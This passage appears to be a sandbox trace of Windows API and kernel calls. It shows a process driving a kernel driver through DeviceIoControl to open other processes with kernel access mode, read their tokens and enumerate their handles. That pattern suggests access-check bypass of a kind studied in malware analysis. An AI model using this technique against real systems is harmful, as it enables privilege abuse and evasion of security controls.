DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691372e0, HandleInformation=0x0) returned 0x0 [0291.937] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.937] PsReleaseProcessExitSynchronization () returned 0x2 [0291.937] ObfDereferenceObject (Object=0xffffe0006a292080) returned 0x1ffe3 [0291.937] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.937] ObfDereferenceObject (Object=0xffffe000691372e0) returned 0x7fff [0291.937] IoCompleteRequest () returned 0x0 [0291.937] PsLookupProcessByProcessId (in: ProcessId=0xdfc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.937] PsAcquireProcessExitSynchronization () returned 0x0 [0291.937] KeStackAttachProcess (in: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400) [0291.937] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a31c730, HandleInformation=0x0) returned 0x0 [0291.937] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.938] PsReleaseProcessExitSynchronization () returned 0x2 [0291.938] ObfDereferenceObject (Object=0xffffe0006a292080) returned 0x1ffe2 [0291.938] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.938] ObfDereferenceObject (Object=0xffffe0006a31c730) returned 0x7fa2 [0291.938] IoCompleteRequest () returned 0x0 [0291.938] PsLookupProcessByProcessId (in: ProcessId=0xdfc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.938] PsAcquireProcessExitSynchronization () returned 0x0 [0291.938] KeStackAttachProcess (in: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400) [0291.938] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a4eab0, HandleInformation=0x0) returned 0x0 [0291.938] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.938] PsReleaseProcessExitSynchronization () returned 0x2 [0291.938] ObfDereferenceObject (Object=0xffffe0006a292080) returned 0x1ffe1 [0291.938] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.938] ObfDereferenceObject (Object=0xffffe00068a4eab0) returned 0x7ffe [0291.938] IoCompleteRequest () returned 0x0 [0291.938] PsLookupProcessByProcessId (in: ProcessId=0xdfc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.938] PsAcquireProcessExitSynchronization () returned 0x0 [0291.938] KeStackAttachProcess (in: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400) [0291.938] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3c0400, HandleInformation=0x0) returned 0x0 [0291.938] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.938] PsReleaseProcessExitSynchronization () returned 0x2 [0291.938] ObfDereferenceObject (Object=0xffffe0006a292080) returned 0x1ffe0 [0291.938] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.938] ObfDereferenceObject (Object=0xffffe0006a3c0400) returned 0x7ffa [0291.938] IoCompleteRequest () returned 0x0 [0291.938] PsLookupProcessByProcessId (in: ProcessId=0xdfc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.938] PsAcquireProcessExitSynchronization () returned 0x0 [0291.938] KeStackAttachProcess (in: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400) [0291.938] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4fb090, HandleInformation=0x0) returned 0x0 [0291.938] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.938] PsReleaseProcessExitSynchronization () returned 0x2 [0291.938] ObfDereferenceObject (Object=0xffffe0006a292080) returned 0x1ffdf [0291.938] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.938] ObfDereferenceObject (Object=0xffffe0006a4fb090) returned 0xffc9 [0291.938] IoCompleteRequest () returned 0x0 [0291.938] PsLookupProcessByProcessId (in: ProcessId=0xdfc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.938] PsAcquireProcessExitSynchronization () returned 0x0 [0291.938] KeStackAttachProcess (in: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400) [0291.938] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4fb090, HandleInformation=0x0) returned 0x0 [0291.938] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.938] PsReleaseProcessExitSynchronization () returned 0x2 [0291.938] ObfDereferenceObject (Object=0xffffe0006a292080) returned 0x1ffde [0291.938] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.938] ObfDereferenceObject (Object=0xffffe0006a4fb090) returned 0xffc8 [0291.938] IoCompleteRequest () returned 0x0 [0291.939] PsLookupProcessByProcessId (in: ProcessId=0xdfc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.939] PsAcquireProcessExitSynchronization () returned 0x0 [0291.939] KeStackAttachProcess (in: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400) [0291.939] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069304af0, HandleInformation=0x0) returned 0x0 [0291.939] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.939] PsReleaseProcessExitSynchronization () returned 0x2 [0291.939] ObfDereferenceObject (Object=0xffffe0006a292080) returned 0x1ffdd [0291.939] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.939] ObfDereferenceObject (Object=0xffffe00069304af0) returned 0x7fff [0291.939] IoCompleteRequest () returned 0x0 [0291.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x188 [0291.939] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.939] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a06e840, HandleInformation=0x0) returned 0x0 [0291.939] ObOpenObjectByPointer (in: Object=0xffffe0006a06e840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a4c) returned 0x0 [0291.939] ObfDereferenceObject (Object=0xffffe0006a06e840) returned 0x2801f [0291.939] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a4c, DesiredAccess=0x8, TokenHandle=0xffffe0006848ab00 | out: TokenHandle=0xffffe0006848ab00*=0x18c) returned 0x0 [0291.939] ZwClose (Handle=0xffffffff80000a4c) returned 0x0 [0291.939] IoCompleteRequest () returned 0x0 [0291.939] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.939] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.963] CloseHandle (hObject=0x18c) returned 1 [0291.963] CloseHandle (hObject=0x188) returned 1 [0291.963] PsLookupProcessByProcessId (in: ProcessId=0x364, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.963] PsAcquireProcessExitSynchronization () returned 0x0 [0291.963] KeStackAttachProcess (in: PROCESS=0xffffe0006a06e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a06e840, ApcState=0xffffd000ac0cf400) [0291.963] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a4ec20, HandleInformation=0x0) returned 0x0 [0291.963] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.963] PsReleaseProcessExitSynchronization () returned 0x2 [0291.963] ObfDereferenceObject (Object=0xffffe0006a06e840) returned 0x2001d [0291.963] ObQueryNameString (in: Object=0xffffe00068a4ec20, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.963] ObfDereferenceObject (Object=0xffffe00068a4ec20) returned 0x7f39 [0291.963] IoCompleteRequest () returned 0x0 [0291.964] PsLookupProcessByProcessId (in: ProcessId=0x364, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.964] PsAcquireProcessExitSynchronization () returned 0x0 [0291.964] KeStackAttachProcess (in: PROCESS=0xffffe0006a06e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a06e840, ApcState=0xffffd000ac0cf400) [0291.964] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006cdfe2e0, HandleInformation=0x0) returned 0x0 [0291.964] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.964] PsReleaseProcessExitSynchronization () returned 0x2 [0291.964] ObfDereferenceObject (Object=0xffffe0006a06e840) returned 0x2001c [0291.964] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3d87c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3d87c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.964] ObfDereferenceObject (Object=0xffffe0006cdfe2e0) returned 0x7fff [0291.964] IoCompleteRequest () returned 0x0 [0291.964] PsLookupProcessByProcessId (in: ProcessId=0x364, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.964] PsAcquireProcessExitSynchronization () returned 0x0 [0291.964] KeStackAttachProcess (in: PROCESS=0xffffe0006a06e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a06e840, ApcState=0xffffd000ac0cf400) [0291.964] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006983c090, HandleInformation=0x0) returned 0x0 [0291.964] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.964] PsReleaseProcessExitSynchronization () returned 0x2 [0291.964] ObfDereferenceObject (Object=0xffffe0006a06e840) returned 0x2001b [0291.964] ObQueryNameString (in: Object=0xffffe0006983c090, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.964] ObfDereferenceObject (Object=0xffffe0006983c090) returned 0x7fff [0291.964] IoCompleteRequest () returned 0x0 [0291.964] PsLookupProcessByProcessId (in: ProcessId=0x364, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.964] PsAcquireProcessExitSynchronization () returned 0x0 [0291.964] KeStackAttachProcess (in: PROCESS=0xffffe0006a06e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a06e840, ApcState=0xffffd000ac0cf400) [0291.964] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693728b0, HandleInformation=0x0) returned 0x0 [0291.964] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.964] PsReleaseProcessExitSynchronization () returned 0x2 [0291.964] ObfDereferenceObject (Object=0xffffe0006a06e840) returned 0x2001a [0291.964] ObQueryNameString (in: Object=0xffffe000693728b0, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.964] ObfDereferenceObject (Object=0xffffe000693728b0) returned 0x7fff [0291.964] IoCompleteRequest () returned 0x0 [0291.964] PsLookupProcessByProcessId (in: ProcessId=0x364, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.964] PsAcquireProcessExitSynchronization () returned 0x0 [0291.964] KeStackAttachProcess (in: PROCESS=0xffffe0006a06e840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a06e840, ApcState=0xffffd000ac0cf400) [0291.964] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006983c2e0, HandleInformation=0x0) returned 0x0 [0291.964] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.964] PsReleaseProcessExitSynchronization () returned 0x2 [0291.964] ObfDereferenceObject (Object=0xffffe0006a06e840) returned 0x20019 [0291.964] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.964] ObfDereferenceObject (Object=0xffffe0006983c2e0) returned 0x8000 [0291.965] IoCompleteRequest () returned 0x0 [0291.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdf0) returned 0x188 [0291.965] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.965] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006847d840, HandleInformation=0x0) returned 0x0 [0291.965] ObOpenObjectByPointer (in: Object=0xffffe0006847d840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a4c) returned 0x0 [0291.965] ObfDereferenceObject (Object=0xffffe0006847d840) returned 0x2fff2 [0291.965] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a4c, DesiredAccess=0x8, TokenHandle=0xffffe0006a51d480 | out: TokenHandle=0xffffe0006a51d480*=0x18c) returned 0x0 [0291.965] ZwClose (Handle=0xffffffff80000a4c) returned 0x0 [0291.965] IoCompleteRequest () returned 0x0 [0291.965] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.965] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.966] CloseHandle (hObject=0x18c) returned 1 [0291.966] CloseHandle (hObject=0x188) returned 1 [0291.966] PsLookupProcessByProcessId (in: ProcessId=0xdf0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.966] PsAcquireProcessExitSynchronization () returned 0x0 [0291.966] KeStackAttachProcess (in: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400) [0291.966] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a904730, HandleInformation=0x0) returned 0x0 [0291.966] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.966] PsReleaseProcessExitSynchronization () returned 0x2 [0291.966] ObfDereferenceObject (Object=0xffffe0006847d840) returned 0x27ff0 [0291.966] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6177c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6177c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.966] ObfDereferenceObject (Object=0xffffe0006a904730) returned 0x7fff [0291.966] IoCompleteRequest () returned 0x0 [0291.966] PsLookupProcessByProcessId (in: ProcessId=0xdf0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.966] PsAcquireProcessExitSynchronization () returned 0x0 [0291.966] KeStackAttachProcess (in: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400) [0291.966] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007deee410, HandleInformation=0x0) returned 0x0 [0291.966] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.966] PsReleaseProcessExitSynchronization () returned 0x2 [0291.966] ObfDereferenceObject (Object=0xffffe0006847d840) returned 0x27fef [0291.966] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.966] ObfDereferenceObject (Object=0xffffe0007deee410) returned 0x7fff [0291.966] IoCompleteRequest () returned 0x0 [0291.966] PsLookupProcessByProcessId (in: ProcessId=0xdf0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.966] PsAcquireProcessExitSynchronization () returned 0x0 [0291.966] KeStackAttachProcess (in: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400) [0291.966] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690c1830, HandleInformation=0x0) returned 0x0 [0291.966] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.966] PsReleaseProcessExitSynchronization () returned 0x2 [0291.966] ObfDereferenceObject (Object=0xffffe0006847d840) returned 0x27fee [0291.966] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.966] ObfDereferenceObject (Object=0xffffe000690c1830) returned 0x7fea [0291.967] IoCompleteRequest () returned 0x0 [0291.967] PsLookupProcessByProcessId (in: ProcessId=0xdf0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.967] PsAcquireProcessExitSynchronization () returned 0x0 [0291.967] KeStackAttachProcess (in: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400) [0291.967] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690c13a0, HandleInformation=0x0) returned 0x0 [0291.967] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.967] PsReleaseProcessExitSynchronization () returned 0x2 [0291.967] ObfDereferenceObject (Object=0xffffe0006847d840) returned 0x27fed [0291.967] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.967] ObfDereferenceObject (Object=0xffffe000690c13a0) returned 0xfffd [0291.967] IoCompleteRequest () returned 0x0 [0291.967] PsLookupProcessByProcessId (in: ProcessId=0xdf0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.967] PsAcquireProcessExitSynchronization () returned 0x0 [0291.967] KeStackAttachProcess (in: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400) [0291.967] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006940c090, HandleInformation=0x0) returned 0x0 [0291.967] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.967] PsReleaseProcessExitSynchronization () returned 0x2 [0291.967] ObfDereferenceObject (Object=0xffffe0006847d840) returned 0x27fec [0291.967] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.967] ObfDereferenceObject (Object=0xffffe0006940c090) returned 0xfffd [0291.967] IoCompleteRequest () returned 0x0 [0291.967] PsLookupProcessByProcessId (in: ProcessId=0xdf0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.967] PsAcquireProcessExitSynchronization () returned 0x0 [0291.967] KeStackAttachProcess (in: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400) [0291.967] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693fa090, HandleInformation=0x0) returned 0x0 [0291.967] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.967] PsReleaseProcessExitSynchronization () returned 0x2 [0291.967] ObfDereferenceObject (Object=0xffffe0006847d840) returned 0x27feb [0291.967] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe00069ba5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069ba5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.967] ObfDereferenceObject (Object=0xffffe000693fa090) returned 0x1fff9 [0291.967] IoCompleteRequest () returned 0x0 [0291.967] PsLookupProcessByProcessId (in: ProcessId=0xdf0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.967] PsAcquireProcessExitSynchronization () returned 0x0 [0291.967] KeStackAttachProcess (in: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006847d840, ApcState=0xffffd000ac0cf400) [0291.967] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693fa090, HandleInformation=0x0) returned 0x0 [0291.967] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.967] PsReleaseProcessExitSynchronization () returned 0x2 [0291.967] ObfDereferenceObject (Object=0xffffe0006847d840) returned 0x27fea [0291.967] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe00068a61044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068a61044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.967] ObfDereferenceObject (Object=0xffffe000693fa090) returned 0x1fff8 [0291.967] IoCompleteRequest () returned 0x0 [0291.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe58) returned 0x188 [0291.968] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.968] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00068a67080, HandleInformation=0x0) returned 0x0 [0291.968] ObOpenObjectByPointer (in: Object=0xffffe00068a67080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: 